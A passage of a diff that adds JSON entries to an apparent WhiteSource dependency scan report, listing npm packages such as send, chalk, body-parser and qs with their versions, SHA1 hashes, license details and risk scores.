"https://registry.npmjs.org/send/-/send-0.17.1.tgz", + "homePage": "https://github.com/pillarjs/send#readme", + "genericPackageIndex": "https://www.npmjs.org/package/send" + }, + "matchType": "SHA1", + "sha1": "c1d8b059f7900f7466dd4938bdc44e11ddb376c8", + "name": "send-0.17.1.tgz", + "artifactId": "send-0.17.1.tgz", + "version": "0.17.1", + "groupId": "send", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5bf307c6-b5c1-458c-b016-48292854e265" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d849a8d8-b642-401a-9eaa-89dc38752019", + "keyId": 27095444, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", + "homePage": "https://github.com/chalk/chalk#readme", + "genericPackageIndex": "https://www.npmjs.org/package/chalk" + }, + "matchType": "SHA1", + "sha1": "cd42541677a54333cf541a49108c1432b44c9424", + "name": "chalk-2.4.2.tgz", + "artifactId": "chalk-2.4.2.tgz", + "version": "2.4.2", + "groupId": "chalk", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/chalk/v/2.4.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "80c37e9f-bd12-49f9-8675-236e683b9e76", + "keyId": 26949373, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/map-obj/-/map-obj-1.0.1.tgz", + "homePage": "https://github.com/sindresorhus/map-obj", + "genericPackageIndex": "https://www.npmjs.org/package/map-obj" + }, + "matchType": "SHA1", + "sha1": "d933ceb9205d82bdcf4886f6742bdc2b4dea146d", + "name": "map-obj-1.0.1.tgz", + "artifactId": "map-obj-1.0.1.tgz", + "version": "1.0.1", + "groupId": "map-obj", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7223d893-de01-44fc-b883-947334ff1697" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b5dbf890-b546-4150-bf79-ec862587fed0", + "keyId": 26948647, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.1.tgz", + "homePage": "https://github.com/substack/node-mkdirp#readme", + "genericPackageIndex": "https://www.npmjs.org/package/mkdirp" + }, + "matchType": "SHA1", + "sha1": "30057438eac6cf7f8c4767f38648d6697d75c903", + "name": "mkdirp-0.5.1.tgz", + "artifactId": "mkdirp-0.5.1.tgz", + "version": "0.5.1", + "groupId": "mkdirp", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/mkdirp/v/0.5.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "bc85aa1e-7735-4a10-a3f2-4017586a6239", + "keyId": 27055515, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/hash.js/-/hash.js-1.1.7.tgz", + "homePage": "https://github.com/indutny/hash.js", + "genericPackageIndex": "https://www.npmjs.org/package/hash.js" + }, + "matchType": "SHA1", + "sha1": "0babca538e8d4ee4a0f8988d68866537a003cf42", + "name": "hash.js-1.1.7.tgz", + "artifactId": "hash.js-1.1.7.tgz", + "version": "1.1.7", + "groupId": "hash.js", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://github.com/indutny/hash.js/blob/v1.1.7/package.json" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "72e513aa-6761-407b-b734-2ce28a7f2df1", + "keyId": 26954610, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ansi-align/-/ansi-align-2.0.0.tgz", + "homePage": "https://github.com/nexdrew/ansi-align#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ansi-align" + }, + "matchType": "SHA1", + "sha1": "c36aeccba563b89ceb556f3690f0b1d9e3547f7f", + "name": "ansi-align-2.0.0.tgz", + "artifactId": "ansi-align-2.0.0.tgz", + "version": "2.0.0", + "groupId": "ansi-align", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ansi-align/v/2.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4faabe9a-2b17-4e01-ba5d-3e5210e08adc", + "keyId": 26948776, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lowercase-keys/-/lowercase-keys-1.0.1.tgz", + "homePage": "https://github.com/sindresorhus/lowercase-keys#readme", + "genericPackageIndex": "https://www.npmjs.org/package/lowercase-keys" + }, + "matchType": "SHA1", + "sha1": "6f9e30b47084d971a7c820ff15a6c5167b74c26f", + "name": "lowercase-keys-1.0.1.tgz", + "artifactId": "lowercase-keys-1.0.1.tgz", + "version": "1.0.1", + "groupId": "lowercase-keys", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2a20b20e-850a-498f-ba17-8cc0b547bd80" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "831f3f21-6edf-4168-aa4a-94d06ac1c5f3", + "keyId": 26955689, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-directory/-/is-directory-0.3.1.tgz", + "homePage": "https://github.com/jonschlinkert/is-directory", + "genericPackageIndex": "https://www.npmjs.org/package/is-directory" + }, + "matchType": "SHA1", + "sha1": "61339b6f2475fc772fd9c9d83f5c8575dc154ae1", + "name": "is-directory-0.3.1.tgz", + "artifactId": "is-directory-0.3.1.tgz", + "version": "0.3.1", + "groupId": "is-directory", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f4476e87-6427-49a7-b4e1-a3a64bed154b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a5c9c474-0f5a-4aed-9bc6-96a26ebb0dfd", + "keyId": 26965625, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/deep-extend/-/deep-extend-0.6.0.tgz", + "homePage": "https://github.com/unclechu/node-deep-extend", + "genericPackageIndex": "https://www.npmjs.org/package/deep-extend" + }, + "matchType": "SHA1", + "sha1": "c4fa7c95404a17a9c3e8ca7e1537312b736330ac", + "name": "deep-extend-0.6.0.tgz", + "artifactId": "deep-extend-0.6.0.tgz", + "version": "0.6.0", + "groupId": "deep-extend", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ede81493-88df-4b86-98e0-2922c49430d9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ec75c6a9-bf1e-4f72-a84e-6fad66a631c1", + "keyId": 26965561, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.1.tgz", + "homePage": "https://github.com/LinusU/buffer-from#readme", + "genericPackageIndex": "https://www.npmjs.org/package/buffer-from" + }, + "matchType": "SHA1", + "sha1": "32713bc028f75c02fdb710d7c7bcec1f2c6070ef", + "name": "buffer-from-1.1.1.tgz", + "artifactId": "buffer-from-1.1.1.tgz", + "version": "1.1.1", + "groupId": "buffer-from", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/buffer-from/v/1.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3c64e72a-23d0-41d9-890c-79d2d91402bb", + "keyId": 26958379, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", + "homePage": "https://github.com/kemitchell/validate-npm-package-license.js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/validate-npm-package-license" + }, + "matchType": "SHA1", + "sha1": "fc91f6b9c7ba15c857f4cb2c5defeec39d4f410a", + "name": "validate-npm-package-license-3.0.4.tgz", + "artifactId": "validate-npm-package-license-3.0.4.tgz", + "version": "3.0.4", + "groupId": "validate-npm-package-license", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ee2d5026-1c10-4388-84fa-a6beae5bc67f" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "39ab6ec1-eca6-4019-9b1f-3c888a9724ed", + "keyId": 26966944, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "homePage": "https://github.com/lydell/js-tokens#readme", + "genericPackageIndex": "https://www.npmjs.org/package/js-tokens" + }, + "matchType": "SHA1", + "sha1": "19203fb59991df98e3a287050d4647cdeaf32499", + "name": "js-tokens-4.0.0.tgz", + "artifactId": "js-tokens-4.0.0.tgz", + "version": "4.0.0", + "groupId": "js-tokens", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/js-tokens/v/4.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "bd15286e-ba43-448d-8517-67b5c81fcb32", + "keyId": 26958325, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz", + "homePage": "https://github.com/visionmedia/node-cookie-signature", + "genericPackageIndex": "https://www.npmjs.org/package/cookie-signature" + }, + "matchType": "SHA1", + "sha1": "e303a882b342cc3ee8ca513a79999734dab3ae2c", + "name": "cookie-signature-1.0.6.tgz", + "artifactId": "cookie-signature-1.0.6.tgz", + "version": "1.0.6", + "groupId": "cookie-signature", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/09867a2e-b181-4c7b-8cc4-fb5b3963a71e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f73f54fe-de5b-4fb0-bc6a-03b0558aba41", + "keyId": 27452495, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/negotiator/-/negotiator-0.6.2.tgz", + "homePage": "https://github.com/jshttp/negotiator#readme", + "genericPackageIndex": "https://www.npmjs.org/package/negotiator" + }, + "matchType": "SHA1", + "sha1": "feacf7ccf525a77ae9634436a64883ffeca346fb", + "name": "negotiator-0.6.2.tgz", + "artifactId": "negotiator-0.6.2.tgz", + "version": "0.6.2", + "groupId": "negotiator", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/negotiator" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "143a825b-0829-46bb-94c6-6923fc50bb79", + "keyId": 26954982, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/pkg-dir#readme", + "genericPackageIndex": "https://www.npmjs.org/package/pkg-dir" + }, + "matchType": "SHA1", + "sha1": "f6d5d1109e19d63edf428e0bd57e12777615334b", + "name": "pkg-dir-2.0.0.tgz", + "artifactId": "pkg-dir-2.0.0.tgz", + "version": "2.0.0", + "groupId": "pkg-dir", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/pkg-dir/v/2.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "34c9a475-a3da-4651-b045-b6500e100f76", + "keyId": 26954619, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/onetime/-/onetime-2.0.1.tgz", + "homePage": "https://github.com/sindresorhus/onetime#readme", + "genericPackageIndex": "https://www.npmjs.org/package/onetime" + }, + "matchType": "SHA1", + "sha1": "067428230fd67443b2794b22bba528b6867962d4", + "name": "onetime-2.0.1.tgz", + "artifactId": "onetime-2.0.1.tgz", + "version": "2.0.1", + "groupId": "onetime", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c1972e2c-d9b0-4ca0-8585-402b6312f3f4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e4e42d61-978f-4a12-b45e-44a8c89bee3e", + "keyId": 27461990, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/body-parser/-/body-parser-1.19.0.tgz", + "homePage": "https://github.com/expressjs/body-parser#readme", + "genericPackageIndex": "https://www.npmjs.org/package/body-parser" + }, + "matchType": "SHA1", + "sha1": "96b2709e57c9c4e09a6fd66a8fd979844f69f08a", + "name": "body-parser-1.19.0.tgz", + "artifactId": "body-parser-1.19.0.tgz", + "version": "1.19.0", + "groupId": "body-parser", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/body-parser" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7a1303d2-909f-450a-9ac2-f4a31bcaabae", + "keyId": 27261911, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-4.1.0.tgz", + "homePage": "https://github.com/chalk/ansi-regex#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ansi-regex" + }, + "matchType": "SHA1", + "sha1": "8b9f8f08cf1acb843756a839ca8c7e3168c51997", + "name": "ansi-regex-4.1.0.tgz", + "artifactId": "ansi-regex-4.1.0.tgz", + "version": "4.1.0", + "groupId": "ansi-regex", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ansi-regex/v/4.1.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5be3b332-d883-4474-84b4-092ec4722799", + "keyId": 26954940, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/array-union/-/array-union-1.0.2.tgz", + "homePage": "https://github.com/sindresorhus/array-union#readme", + "genericPackageIndex": "https://www.npmjs.org/package/array-union" + }, + "matchType": "SHA1", + "sha1": "9a34410e4f4e3da23dea375be5be70f24778ec39", + "name": "array-union-1.0.2.tgz", + "artifactId": "array-union-1.0.2.tgz", + "version": "1.0.2", + "groupId": "array-union", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ce7be242-d9e9-4267-92a0-5d41559429c9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c544b541-7a00-484b-aa3a-56aa48e76446", + "keyId": 26955588, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-3.0.0.tgz", + "homePage": "https://github.com/chalk/ansi-regex#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ansi-regex" + }, + "matchType": "SHA1", + "sha1": "ed0317c322064f79466c02966bddb605ab37d998", + "name": "ansi-regex-3.0.0.tgz", + "artifactId": "ansi-regex-3.0.0.tgz", + "version": "3.0.0", + "groupId": "ansi-regex", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ansi-regex" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "559fe57c-e0c8-4320-ba68-fac3f83ff917", + "keyId": 26998441, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/css/-/css-2.2.4.tgz", + "homePage": "https://github.com/reworkcss/css#readme", + "genericPackageIndex": "https://www.npmjs.org/package/css" + }, + "matchType": "SHA1", + "sha1": "c646755c73971f2bba6a601e2cf2fd71b1298929", + "name": "css-2.2.4.tgz", + "artifactId": "css-2.2.4.tgz", + "version": "2.2.4", + "groupId": "css", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/css/v/2.2.4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b079760b-1dec-4da5-820e-3f71013d18f6", + "keyId": 26966768, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/es6-promisify/-/es6-promisify-5.0.0.tgz", + "homePage": "https://github.com/digitaldesignlabs/es6-promisify#readme", + "genericPackageIndex": "https://www.npmjs.org/package/es6-promisify" + }, + "matchType": "SHA1", + "sha1": "5109d62f3e56ea967c4b63505aef08291c8a5203", + "name": "es6-promisify-5.0.0.tgz", + "artifactId": "es6-promisify-5.0.0.tgz", + "version": "5.0.0", + "groupId": "es6-promisify", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b6924e8e-de44-49e2-b8b4-2ef085de624e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "cf52ba15-78ae-4159-b901-06da0f48d6b7", + "keyId": 26955397, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", + "homePage": "https://github.com/sindresorhus/has-flag#readme", + "genericPackageIndex": "https://www.npmjs.org/package/has-flag" + }, + "matchType": "SHA1", + "sha1": "b5d454dc2199ae225699f3467e5a07f3b955bafd", + "name": "has-flag-3.0.0.tgz", + "artifactId": "has-flag-3.0.0.tgz", + "version": "3.0.0", + "groupId": "has-flag", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/has-flag/v/3.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8bf6ca43-d0d5-4c9a-955e-b8f32c71c6bb", + "keyId": 27060560, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.1.0.tgz", + "homePage": "https://github.com/jslicense/spdx-correct.js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/spdx-correct" + }, + "matchType": "SHA1", + "sha1": "fb83e504445268f154b074e218c87c003cd31df4", + "name": "spdx-correct-3.1.0.tgz", + "artifactId": "spdx-correct-3.1.0.tgz", + "version": "3.1.0", + "groupId": "spdx-correct", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/spdx-correct" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "57a98be8-b0e9-4779-8ef9-cf6df84c78b3", + "keyId": 27554335, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-2.4.3.tgz", + "homePage": "https://github.com/iarna/write-file-atomic", + "genericPackageIndex": "https://www.npmjs.org/package/write-file-atomic" + }, + "matchType": "SHA1", + "sha1": "1fd2e9ae1df3e75b8d8c367443c692d4ca81f481", + "name": "write-file-atomic-2.4.3.tgz", + "artifactId": "write-file-atomic-2.4.3.tgz", + "version": "2.4.3", + "groupId": "write-file-atomic", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/write-file-atomic" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4027b9bd-02b5-4678-8e9f-2a7f4e15b519", + "keyId": 26958350, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.isstring/-/lodash.isstring-4.0.1.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.isstring" + }, + "matchType": "SHA1", + "sha1": "d527dfb5456eca7cc9bb95d5daeaf88ba54a5451", + "name": "lodash.isstring-4.0.1.tgz", + "artifactId": "lodash.isstring-4.0.1.tgz", + "version": "4.0.1", + "groupId": "lodash.isstring", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/lodash.isstring/v/4.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3c8f3866-c721-4d73-bccc-e1c8b2fafb84", + "keyId": 26955102, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/path-exists/-/path-exists-3.0.0.tgz", + "homePage": "https://github.com/sindresorhus/path-exists#readme", + "genericPackageIndex": "https://www.npmjs.org/package/path-exists" + }, + "matchType": "SHA1", + "sha1": "ce0ebeaa5f78cb18925ea7d810d7b59b010fd515", + "name": "path-exists-3.0.0.tgz", + "artifactId": "path-exists-3.0.0.tgz", + "version": "3.0.0", + "groupId": "path-exists", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b222b1b8-21f3-4531-af53-7aa72117eb45" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a4dc0d09-2d56-4f74-a423-8c26dd427471", + "keyId": 26966943, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/html-entities/-/html-entities-1.2.1.tgz", + "homePage": "https://github.com/mdevils/node-html-entities#readme", + "genericPackageIndex": "https://www.npmjs.org/package/html-entities" + }, + "matchType": "SHA1", + "sha1": "0df29351f0721163515dfb9e5543e5f6eed5162f", + "name": "html-entities-1.2.1.tgz", + "artifactId": "html-entities-1.2.1.tgz", + "version": "1.2.1", + "groupId": "html-entities", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f0bf0dc7-094e-4a20-a753-cca9874d9906" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "42ae1de1-d5fe-4331-9af5-6e6e462d21f2", + "keyId": 27297063, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/qs/-/qs-6.7.0.tgz", + "homePage": "https://github.com/ljharb/qs", + "genericPackageIndex": "https://www.npmjs.org/package/qs" + }, + "matchType": "SHA1", + "sha1": "41dc1a015e3d581f1621776be31afb2876a9b1bc", + "name": "qs-6.7.0.tgz", + "artifactId": "qs-6.7.0.tgz", + "version": "6.7.0", + "groupId": "qs", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/qs/v/6.7.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": 